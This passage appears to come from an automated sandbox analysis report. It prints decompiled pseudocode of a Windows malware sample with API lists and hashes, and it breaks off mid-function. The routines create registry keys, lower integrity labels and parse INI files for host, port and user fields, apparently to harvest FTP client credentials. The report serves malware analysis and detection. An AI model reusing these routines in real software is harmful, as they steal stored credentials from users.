    • Instruction Fuzzy Hash: 2411363710011DA7CB112E6999849FF36589B85761B1B803BFE28E7350CB3DCDC292AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A93B(short* _a4) {
    				char _v5;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				int _v24;
    				long _t18;
    
    				_v5 = 0;
    				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
    				_t33 = _t18;
    				if(_t18 == 0) {
    					_v12 = 0;
    					do {
    						E0041A7A0(6, 4, _t33, 2, _a4);
    						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
    							goto L4;
    						} else {
    							RegCloseKey(_v20);
    							if(_v24 == 1) {
    								_v5 = 1;
    							} else {
    								goto L4;
    							}
    						}
    						L7:
    						RegCloseKey(_v16);
    						goto L8;
    						L4:
    						_v12 = _v12 + 1;
    					} while (_v12 < 0x64);
    					goto L7;
    				}
    				L8:
    				return _v5;
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x0041a960
    0x0041a963
    0x0041a965
    0x0041a967
    0x0041a970
    0x0041a973
    0x0041a97c
    0x0041a999
    0x00000000
    0x0041a99b
    0x0041a99e
    0x0041a9a4
    0x0041a9b1
    0x00000000
    0x00000000
    0x00000000
    0x0041a9a4
    0x0041a9b5
    0x0041a9b8
    0x00000000
    0x0041a9a6
    0x0041a9a6
    0x0041a9a9
    0x00000000
    0x0041a9af
    0x0041a9bb
    0x0041a9c1

    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0041A963
      • Part of subcall function 0041A7A0: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A8C1
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0041A995
    • RegCloseKey.ADVAPI32(?), ref: 0041A99E
    • RegCloseKey.ADVAPI32(?), ref: 0041A9B8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreate$CharUpper
    • String ID: SOFTWARE\Microsoft$d
    • API String ID: 1794619670-1227932965
    • Opcode ID: f87a447489ce9b4e0618304390e8080099b321078ab76f4e1a3ff904a8be020a
    • Instruction ID: e3738e24e1d9ab8f44b10df7595de004fbfcb88025abaffe2bc1b40fe986c47c
    • Opcode Fuzzy Hash: f87a447489ce9b4e0618304390e8080099b321078ab76f4e1a3ff904a8be020a
    • Instruction Fuzzy Hash: 23115EB590120CBEEB019B948C81EEFBB7CEB44388F114466FA0172151D2759E958B7A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E00419AA2(intOrPtr _a4) {
    				struct _ACL* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				int _v16;
    				int _v20;
    				void** _t11;
    				int _t16;
    				struct _ACL* _t18;
    
    				_t18 = 0;
    				E00417AED(L"SeSecurityPrivilege");
    				_t11 =  &_v12;
    				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
    				if(_t11 != 0) {
    					_v8 = 0;
    					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
    					if(_t16 != 0) {
    						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
    						if(_t16 == 0) {
    							_t18 = 1;
    						}
    					}
    					LocalFree(_v12);
    				}
    				return _t18;
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x00419aae
    0x00419ab0
    0x00419ab6
    0x00419ac1
    0x00419ac9
    0x00419ada
    0x00419add
    0x00419ae5
    0x00419af4
    0x00419afc
    0x00419afe
    0x00419afe
    0x00419afc
    0x00419b03
    0x00419b03
    0x00419b0d

    APIs
      • Part of subcall function 00417AED: GetCurrentThread.KERNEL32 ref: 00417AFD
      • Part of subcall function 00417AED: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B04
      • Part of subcall function 00417AED: OpenProcessToken.ADVAPI32(000000FF,00000020,0040E7CE,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B16
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00419AC1
    • GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 00419ADD
    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 00419AF4
    • LocalFree.KERNEL32(?), ref: 00419B03
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
    • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 3555451682-1937014404
    • Opcode ID: 7e361b9ed55d4d2efd85c6a056c312ce8036b60ea4264fa61bac2ab058613b5f
    • Instruction ID: 0d5a7cff9204bc65e3871225ef8784af8471197b60ca19cc1ac964c1f3b86b6a
    • Opcode Fuzzy Hash: 7e361b9ed55d4d2efd85c6a056c312ce8036b60ea4264fa61bac2ab058613b5f
    • Instruction Fuzzy Hash: E3013CB564020CBFEB119FA09D85FEF7B7CEB04784F000066F602F11A0E675AE94DA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E004077F4(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t47;
    				signed short _t58;
    				int _t65;
    				signed int _t66;
    				signed short _t75;
    				void* _t79;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t65 = GetAncestor(_a4, 2);
    					if(_t65 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t70 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t65;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t66 = _a12 & 0x0000ffff;
    					_v8 = _t66;
    					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
    					if(_a12 != 1) {
    						_t47 = E00407715(_t70, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t66 - 8;
    						if(__eflags > 0) {
    							__eflags = _t66 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t66);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t66 - 0x11;
    							if(_t66 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E00407585(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t66 - 0x14;
    							if(_t66 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t66 - 0x15;
    							if(_t66 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t66 - 2;
    						if(_t66 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t66 - 3;
    						if(_t66 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t66 - 5;
    						if(_t66 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t66 - 6 - 1;
    						if(_t66 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E00407585(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t66 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t58 = E004083E4(0, _t79, 0);
    					_push(_a24);
    					_push(_t58 & 0x0000ffff);
    					_t47 = E00407715(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x004077f4
    0x004077f7
    0x004077fb
    0x004077fe
    0x00407806
    0x00407823
    0x0040782b
    0x00000000
    0x00000000
    0x0040782d
    0x00407848
    0x00407850
    0x00407866
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040786c
    0x0040786c
    0x0040786c
    0x00407882
    0x0040788a
    0x00407891
    0x004078bc
    0x004078c1
    0x004078c4
    0x004078c7
    0x004079de
    0x004079e1
    0x00407a26
    0x00407a2b
    0x00407a56
    0x00407a5b
    0x00407975
    0x00407979
    0x00407979
    0x00407a61
    0x00407a63
    0x00407a63
    0x00407a66
    0x00000000
    0x00000000
    0x00407a6c
    0x00407a6f
    0x00407964
    0x00407964
    0x0040796a
    0x0040796b
    0x00407970
    0x00407973
    0x00000000
    0x00407973
    0x00407a75
    0x00407a75
    0x00407a78
    0x00407a7b
    0x00000000
    0x00407a7b
    0x00407a30
    0x00407a33
    0x00407a38
    0x00000000
    0x00000000
    0x00407a45
    0x00407a51
    0x00000000
    0x00407a51
    0x004079e3
    0x00407932
    0x00407932
    0x00407935
    0x004078b0
    0x004078b0
    0x00000000
    0x004078b0
    0x004079e9
    0x004079ec
    0x004079a0
    0x004079a0
    0x004079a5
    0x004079b9
    0x004079b9
    0x00000000
    0x004079a5
    0x004079ee
    0x004079f1
    0x00407a11
    0x00407a16
    0x0040790a
    0x0040790a
    0x0040790f
    0x0040790f
    0x00000000
    0x00000000
    0x00000000
    0x00407911
    0x0040795f
    0x0040795f
    0x00000000
    0x0040795f
    0x004079f3
    0x004079f6
    0x00000000
    0x00000000
    0x004079fc
    0x00407a01
    0x00000000
    0x00000000
    0x00407a07
    0x00000000
    0x00407a07
    0x004078cd
    0x004079c0
    0x004079c5
    0x00000000
    0x00000000
    0x004079cb
    0x004079ce
    0x004079d5
    0x00000000
    0x00000000
    0x004079d7
    0x00000000
    0x004079d7
    0x004078d3
    0x004078d6
    0x0040798e
    0x00407993
    0x00000000
    0x00000000
    0x00407995
    0x0040799a
    0x00000000
    0x00000000
    0x00000000
    0x0040799a
    0x004078dc
    0x004078df
    0x00407958
    0x0040795d
    0x0040797c
    0x00407981
    0x00000000
    0x00000000
    0x00407987
    0x00000000
    0x00407987
    0x00000000
    0x0040795d
    0x004078e1
    0x004078e4
    0x0040793b
    0x00407940
    0x0040794b
    0x00407950
    0x00000000
    0x00000000
    0x00407952
    0x00407954
    0x00407946
    0x00407946
    0x00000000
    0x00407946
    0x00407942
    0x00407944
    0x00000000
    0x00407944
    0x004078e9
    0x004078ec
    0x00000000
    0x00000000
    0x004078ee
    0x004078f3
    0x00407927
    0x0040792c
    0x0040792f
    0x00000000
    0x0040792f
    0x004078f5
    0x004078fa
    0x00000000
    0x00000000
    0x004078fc
    0x00407901
    0x00000000
    0x00000000
    0x00407903
    0x00407908
    0x00000000
    0x00000000
    0x00000000
    0x00407908
    0x00407899
    0x0040789e
    0x004078a4
    0x004078ab
    0x00000000
    0x004078ab

    APIs
    • GetAncestor.USER32(?,00000002), ref: 0040781D
    • SendMessageTimeoutW.USER32 ref: 00407848
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 0040788A
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00407920
    • PostMessageW.USER32(?,00000112,?,?), ref: 00407973
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004079B2
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: d10eeb8b160b5209b332f052e9ce65faab0a862498f70623044e3137c689ab0a
    • Instruction ID: 5723f23ea4cd824f7c706b940b28baf035dbc1d0dc1771281f15a2580d02225a
    • Opcode Fuzzy Hash: d10eeb8b160b5209b332f052e9ce65faab0a862498f70623044e3137c689ab0a
    • Instruction Fuzzy Hash: F1517DB1E08309AAFF315A29CC85FBE3624EB05350F244533F981B62E1C27DE991D65B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00413F55(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				short _v528;
    				char _v568;
    				short _v584;
    				char _v596;
    				short _v600;
    				char _v608;
    				short _v612;
    				char _v616;
    				short _v620;
    				char _v624;
    				short _v628;
    				short* _v632;
    				WCHAR* _v636;
    				WCHAR* _v640;
    				WCHAR* _v644;
    				WCHAR* _v648;
    				WCHAR* _v652;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t54;
    				WCHAR* _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t67;
    				void* _t69;
    				WCHAR* _t72;
    				WCHAR* _t74;
    				long _t78;
    				int _t81;
    				long _t85;
    				long _t88;
    				WCHAR* _t89;
    				void* _t90;
    				WCHAR* _t94;
    				WCHAR* _t95;
    				WCHAR* _t111;
    				WCHAR* _t112;
    				WCHAR* _t117;
    				intOrPtr _t126;
    				signed int _t127;
    				void* _t129;
    
    				_t129 = (_t127 & 0xfffffff8) - 0x284;
    				if(E0041BCB4( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L21:
    					return 1;
    				}
    				_t132 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t117 = E004163F1(0x1fffe);
    					_v628 = _t117;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						goto L21;
    					}
    					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
    					__eflags = _t54;
    					if(_t54 <= 0) {
    						L20:
    						E00416421(_t117);
    						goto L21;
    					}
    					_t9 =  &(_t54[0]); // 0x1
    					_t57 = E004172D1(_t117, _t9);
    					__eflags = _t57;
    					if(_t57 == 0) {
    						goto L20;
    					}
    					_t111 = E004163F1(0xc1c);
    					_v640 = _t111;
    					__eflags = _t111;
    					if(_t111 != 0) {
    						_t11 =  &(_t111[0x2fd]); // 0x5fa
    						_v632 = _t11;
    						_v644 = _t117;
    						_t61 = 0x72;
    						E004159A4(_t61,  &_v584);
    						_t63 = 0x73;
    						E004159A4(_t63,  &_v596);
    						_t65 = 0x74;
    						E004159A4(_t65,  &_v608);
    						_t67 = 0x75;
    						E004159A4(_t67,  &_v624);
    						_t69 = 0x76;
    						E004159A4(_t69,  &_v616);
    						goto L9;
    						L18:
    						_t74 = E0041730D(_v648, 1);
    						_v652 = _t74;
    						__eflags = _t74;
    						if(_t74 != 0) {
    							_t111 = _v644;
    							L9:
    							_t72 = StrStrIW(_v644,  &_v584);
    							__eflags = _t72;
    							if(_t72 == 0) {
    								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
    								__eflags = _t78;
    								if(_t78 != 0) {
    									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
    									_v640 = _t81;
    									__eflags = _t81 - 1 - 0xfffe;
    									if(_t81 - 1 <= 0xfffe) {
    										_t112 =  &(_t111[0xff]);
    										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
    										__eflags = _t85;
    										if(_t85 != 0) {
    											_t33 =  &(_t112[0xff]); // 0x0
    											_t124 = _t33;
    											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
    											__eflags = _t88;
    											if(_t88 != 0) {
    												_t89 = E00416F70(_t124);
    												__eflags = _t89;
    												if(_t89 > 0) {
    													_t125 =  &_v568;
    													_t90 = 0x55;
    													E004159A4(_t90,  &_v568);
    													_push(_v640);
    													_t38 =  &(_t112[0xff]); // 0x0
    													_push(_v644);
    													_push(_t112);
    													_t113 = _v636;
    													_t94 = E00417114(_t125, 0x311, _v636, _t125);
    													_t129 = _t129 + 0x14;
    													__eflags = _t94;
    													if(_t94 > 0) {
    														_t126 = _a4;
    														_t95 = E00416815(_t94, _t126, _t113);
    														__eflags = _t95;
    														if(_t95 != 0) {
    															_t42 = _t126 + 4;
    															 *_t42 =  &(( *(_t126 + 4))[0]);
    															__eflags =  *_t42;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L18;
    						}
    						E00416421(_v644);
    						_t117 = _v636;
    					}
    					goto L20;
    				} else {
    					E00413F1D(_t132,  &_v524, _a4);
    					goto L21;
    				}
    			}

    APIs
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • GetPrivateProfileStringW.KERNEL32 ref: 00413FCA
    • StrStrIW.SHLWAPI(?,?), ref: 00414057
    • GetPrivateProfileStringW.KERNEL32 ref: 0041407F
    • GetPrivateProfileIntW.KERNEL32 ref: 0041409C
    • GetPrivateProfileStringW.KERNEL32 ref: 004140CD
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 24406da1c64757d6c4459e16a82df0878c00bdf76cb5d4c62d95ca081e0d2e1f
    • Instruction ID: 237be15bd4d7b03567e2d98d3220d04c3bfe5884ad03ec240c11ef771a8e3e80
    • Opcode Fuzzy Hash: 24406da1c64757d6c4459e16a82df0878c00bdf76cb5d4c62d95ca081e0d2e1f
    • Instruction Fuzzy Hash: 1551A372504306ABD710EF65CC45AEBB7E8EFC4714F04082EBA88D7251DB78DD8587AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411897(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
    				char _v5;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				char _v24;
    				long _v28;
    				void* __edi;
    				void* __esi;
    				signed int _t55;
    				void* _t58;
    				struct _GOPHER_FIND_DATAA _t59;
    				intOrPtr _t60;
    				struct _GOPHER_FIND_DATAA _t61;
    				struct _GOPHER_FIND_DATAA _t62;
    				signed int _t71;
    				struct _GOPHER_FIND_DATAA _t79;
    				struct _GOPHER_FIND_DATAA _t84;
    				int _t89;
    				struct _GOPHER_FIND_DATAA _t91;
    				void* _t96;
    				intOrPtr* _t99;
    				struct _GOPHER_FIND_DATAA _t103;
    				struct _GOPHER_FIND_DATAA _t107;
    
    				_v16 = _v16 | 0xffffffff;
    				EnterCriticalSection(0x4230dc);
    				_t99 = _a4;
    				_t55 = E004110FC( *_t99);
    				if(_t55 == 0xffffffff) {
    					L33:
    					LeaveCriticalSection(0x4230dc);
    					return _v16;
    				}
    				_t58 = _t55 * 0x24 +  *0x4230f4;
    				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
    					goto L33;
    				}
    				_t96 = _t58;
    				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
    					_t59 = _a16;
    					__eflags = _t59;
    					if(_t59 != 0) {
    						 *_t59 =  *_t59 & 0x00000000;
    						__eflags =  *_t59;
    					}
    					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
    					if(__eflags != 0) {
    						L22:
    						_t60 =  *((intOrPtr*)(_t96 + 0x18));
    						__eflags = _t60 - 0xffffffff;
    						if(_t60 != 0xffffffff) {
    							__eflags = _v16 - 0xffffffff;
    							if(_v16 == 0xffffffff) {
    								_t61 = _t60 -  *(_t96 + 0x1c);
    								__eflags = _t61;
    								_t103 = _t61;
    								if(_t61 != 0) {
    									__eflags = _a8;
    									if(_a8 == 0) {
    										_a12 = E004177A6(0x2000, 0x1000);
    									}
    									__eflags = _a12 - _t103;
    									_t103 =  <  ? _a12 : _t103;
    									__eflags = _a8;
    									if(_a8 != 0) {
    										E0041645D(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
    										_t50 = _t96 + 0x1c;
    										 *_t50 =  *(_t96 + 0x1c) + _t103;
    										__eflags =  *_t50;
    									}
    								}
    								_t62 = _a16;
    								__eflags = _t62;
    								if(_t62 != 0) {
    									 *_t62 = _t103;
    								}
    								_v16 = 1;
    							}
    						}
    						goto L32;
    					}
    					LeaveCriticalSection(0x4230dc);
    					_v5 = E0041177E( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
    					EnterCriticalSection(0x4230dc);
    					__eflags = _v5;
    					if(_v5 == 0) {
    						L21:
    						_t37 =  &_v16;
    						 *_t37 = _v16 & 0x00000000;
    						__eflags =  *_t37;
    						SetLastError(0x2ee4);
    						goto L22;
    					}
    					_t105 =  *_a4;
    					_t71 = E004110FC( *_a4);
    					__eflags = _t71 - 0xffffffff;
    					if(_t71 == 0xffffffff) {
    						E00416421(_v12);
    						goto L21;
    					}
    					_t96 = _t71 * 0x24 +  *0x4230f4;
    					_t101 = E00418557( &_v24, _t105);
    					_t79 = E00410561( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L19:
    						E00416421(_t101);
    						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
    						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
    						goto L22;
    					}
    					_t84 = E00416661(_v24, 0, _t101);
    					_a4 = _t84;
    					__eflags = _t84;
    					if(_t84 == 0) {
    						goto L19;
    					}
    					_v28 = 0x1000;
    					_t107 = E004163F1(0x1000);
    					__eflags = _t107;
    					if(_t107 == 0) {
    						L18:
    						E00416421(_a4);
    						goto L19;
    					}
    					 *_t107 = 0x50;
    					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
    					__eflags = _t89;
    					if(_t89 != 0) {
    						_t91 =  *(_t107 + 8);
    						__eflags = _t91;
    						if(_t91 != 0) {
    							__eflags =  *_t91;
    							if( *_t91 != 0) {
    								E0041B5DA(_t91, _v12, _v20);
    							}
    						}
    					}
    					E00416421(_t107);
    					goto L18;
    				} else {
    					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
    					L32:
    					goto L33;
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(004230DC), ref: 004118A8
    • LeaveCriticalSection.KERNEL32(004230DC), ref: 0041190B
    • EnterCriticalSection.KERNEL32(004230DC), ref: 00411928
    • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 004119AC
    • SetLastError.KERNEL32(00002EE4), ref: 00411A02
    • LeaveCriticalSection.KERNEL32(004230DC), ref: 00411A6B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
    • String ID:
    • API String ID: 3653105453-0
    • Opcode ID: 1a12442e00ac2e83faea97f876902e4f296eb016343183dadea7583fa192c143
    • Instruction ID: f59090dd056eed856a983841abbb2c7333dd38c8591173eb91c5646d08c30ff8
    • Opcode Fuzzy Hash: 1a12442e00ac2e83faea97f876902e4f296eb016343183dadea7583fa192c143
    • Instruction Fuzzy Hash: 5151A171A00209EFCF10DFA5D885BDE7BB4EF04365F044156FA20AB2A5D778DA80CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00413B5E(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				short* _v16;
    				WCHAR* _v20;
    				short _v32;
    				short _v48;
    				short _v68;
    				short _v88;
    				short _v112;
    				char _v144;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t40;
    				long _t41;
    				void* _t48;
    				void* _t50;
    				void* _t52;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t61;
    				WCHAR* _t64;
    				void* _t72;
    				void* _t76;
    				WCHAR* _t83;
    				WCHAR* _t84;
    				WCHAR* _t86;
    				intOrPtr _t96;
    				void* _t97;
    
    				_t81 = __edx;
    				_t40 = E004163F1(0x1fffe);
    				_t86 = _t40;
    				_v20 = _t86;
    				if(_t86 == 0) {
    					return _t40;
    				}
    				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
    				if(_t41 <= 0) {
    					L17:
    					return E00416421(_t86);
    				}
    				_t3 = _t41 + 1; // 0x1
    				if(E004172D1(_t86, _t3) == 0) {
    					goto L17;
    				}
    				_t83 = E004163F1(0xc08);
    				_v12 = _t83;
    				if(_t83 == 0) {
    					goto L17;
    				} else {
    					_t5 =  &(_t83[0x2fd]); // 0x5fa
    					_v16 = _t5;
    					_v8 = _t86;
    					_t48 = 0x65;
    					E004159A4(_t48,  &_v112);
    					_t50 = 0x66;
    					E004159A4(_t50,  &_v48);
    					_t52 = 0x67;
    					E004159A4(_t52,  &_v32);
    					_t54 = 0x68;
    					E004159A4(_t54,  &_v88);
    					_t56 = 0x69;
    					E004159A4(_t56,  &_v68);
    					goto L6;
    					L15:
    					_t61 = E0041730D(_v8, 1);
    					_v8 = _t61;
    					if(_t61 != 0) {
    						_t83 = _v12;
    						L6:
    						if(StrStrIW(_v8,  &_v112) == 0) {
